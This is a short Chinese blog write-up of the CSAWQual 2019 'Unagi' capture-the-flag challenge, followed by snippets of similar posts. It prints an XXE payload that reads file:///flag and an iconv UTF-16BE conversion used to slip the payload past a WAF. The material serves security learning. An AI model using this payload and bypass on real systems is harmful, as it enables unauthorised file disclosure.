【CSAWQual 2019】Unagi

于 2025-04-02 08:26:43 发布
阅读量94 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 网络安全 NSSCTF CSAWQual
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LDdfq/article/details/146775401

直接上传恶意XML显示有WAF,尝试编码绕过

<?xml version='1.0'?> 
<!DOCTYPE x [
    <!ENTITY xxe SYSTEM "file:///flag">
]>
<users>
<user>
<username>alice</username>
<password>passwd1</password>
<name>Alice</name>
<email>alice@fakesite.com</email>
<group>CSAW2019</group>
</user>
<user>
<username>bob</username>
<password>passwd2</password>
<name>Bob</name>
<email>bob@fakesite.com</email>
<intro>&xxe;</intro>
</user>
</users>

然后在Linux系统,

通过iconv转换成utf-16编码绕过

iconv -f UTF-8 -t UTF-16BE 1.xml > 2.xml

XiaoHei_Q
关注
[CSAWQual 2019]Web_Unagi - 文件上传+XXE注入(XML编码绕过)
oZuoShen123的博客
10-10 1555
alice passwd1 Alice [email protected] CSAW2019 bob passwd2 Bob [email protected]
[CSAWQual 2019]Web_Unagi
snowlyzz的博客
09-13 230
xxe 绕过waf。
[CSAWQual 2019]Unagi
2301_81866263的博客
08-07 404
把这个文档用编码格式为 UTF-16BE(大端字节序)是一个xml文件那么要上传这种文件很明显是xxe了。结果被waf了,可以试一下编码绕过。先上传一个正常的xml文件看一下。看一下他的给的样式的源代码。flag在/flag里。然后上传这个1.xml。
BUUCTF-[CSAWQual 2019]Web_Unagi 1
dian的博客
11-10 334
在 UTF-16 编码下,XML 文档中的字符表示方式发生了改变。waf在处理 UTF-16 编码的 XML 时,无法正确解析或识别外部实体引用,从而让包含恶意外部实体的 XML 文档得以通过。定义文档类型为users,并在其中定义了一个实体xxe,通过SYSTEM关键字指定其值从本地文件系统的/flag文件中读取。,如果这个 XML 被解析,会尝试读取 /flag 文件的内容并显示在这里。给了一段xml文档,尝试在xml文档中添加xxe注入攻击,新建一个xml文档。再上传就能绕过waf,得到flag。
BUUCTF [CSAWQual 2019]Web_Unagi 1
weixin_45642610的博客
09-09 692
BUUCTF [CSAWQual 2019]Web_Unagi 1 提示在/flag 有提示了上传xml文件及其格式 直接用之前xml注入的上传即可。 改文件名为1.xml上传即可得flag <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>&xx
buuctf_练[CSAWQual 2019]Web_Unagi
m0_66225311的博客
10-26 421
`XXE`漏洞利用,`xml`文件转换编码绕过`WAF`(UTF-8 --> UTF-16),`xml`文件格式的书写
[CSAWQual 2019]Web_Unagi ---不会编程的崽
不会编程的崽的博客
03-07 640
xxe编码绕过
[CSAWQual 2019]Web_Unagi XXE漏洞练习题
dalaojiaoweb的博客
07-09 386
进来之后我们进行一个信息收集,在upload下可以看到有个here的超链接。点进去之后得到了如下的一些信息。使用我们的Visual Studio Code进行一个编码的转换,因为直接上传会被waf过滤。可以猜到是需要我们利用文件上传包含xxe漏洞利用来得到flag。利用我们学习的xxe漏洞的知识来进行一个模板的套用。最后进行一个文件上传即可得到flag。选择utf-16 LE,然后保存。这道题就是简单的xxe漏洞的注入。
BUUCTF:[CSAWQual 2019]Web_Unagi
../../../../../../../
06-08 1082
打开界面 看看其他有什么内容: 来看看格式事例: 从信息提示我们可以知道要通过编写xml文件上传 即通过XXE编码转换成utf-16编码绕过 我们可以利用vim编辑xml文件(取名为2.xml) 构造payload如下: <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <
BUUCTF:[CSAWQual 2019]Web_Unagi -- xxe 简单的外部实体bypass ,编码绕过,
Zero_Adam的博客
04-08 770
二、学的的 这个好像是xxe的那啥,默认技巧吧,,utf8上传说有waf,然后就换成utf16进行上传 最近做的xxe的题,都是简单的每waf的。外部实体注入就好了,,, 注意,如果,system的命令 file:///flag。不好使的时候,还可用 PHP的伪协议来做,php://filer/这些来,到时候多试试就好了 三、 WP 初末 看一下iconv命令吧,总不能一个题什么都没学到东西啊, 语句: iconv -f utf8 -t utf16 test.xml -o aaa.xml 这个语句弄上
xxe编码绕过(8-19)
Realiy的博客
08-19 1833
[CSAWQual 2019]Web_Unagi 只能上传xml文件,考虑存在xxe 直接上传显示waf拦截了,转换成utf16编码就能绕过 <!--filename:1.xml--> <!--author:ta3shi--> <!DOCTYPE users[ <!ENTITY a SYSTEM "file:///flag"> ]> <users> <user> <username>Alice</u
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8732
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
js-时事通讯-设计完美HTML时事通讯的9个技巧.docx
06-30
js-时事通讯-设计完美HTML时事通讯的9个技巧.docx
AnyBackup-SQLServer应用容灾最佳实践.docx
06-30
AnyBackup-SQLServer应用容灾最佳实践.docx
发展大数据-扩大影响力.docx
06-30
发展大数据-扩大影响力.docx
我国智慧城市发展现状及未来趋势探索.docx
06-30
我国智慧城市发展现状及未来趋势探索.docx
Maven配置阿里云镜像仓库操作指南
最新发布
06-30
资源下载链接为: https://pan.quark.cn/s/9e7ef05254f8 以下几种表述供你参考: 为 Maven 设置阿里云镜像仓库。 配置 Maven 使用阿里云镜像仓库。 将 Maven 配置为使用阿里云镜像仓库。 Maven 配置阿里云镜像仓库教程。 Maven 如何配置阿里云镜像仓库。 Maven 配置阿里云镜像仓库指南。 Maven 配置阿里云镜像仓库的方法。 Maven 配置阿里云镜像仓库的步骤。 Maven 配置阿里云镜像仓库的流程。 Maven 配置阿里云镜像仓库的操作。 Maven 配置阿里云镜像仓库的详细步骤。 Maven 配置阿里云镜像仓库的具体方法。 Maven 配置阿里云镜像仓库的完整流程。 Maven 配置阿里云镜像仓库的详细教程。 Maven 配置阿里云镜像仓库的完整指南。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值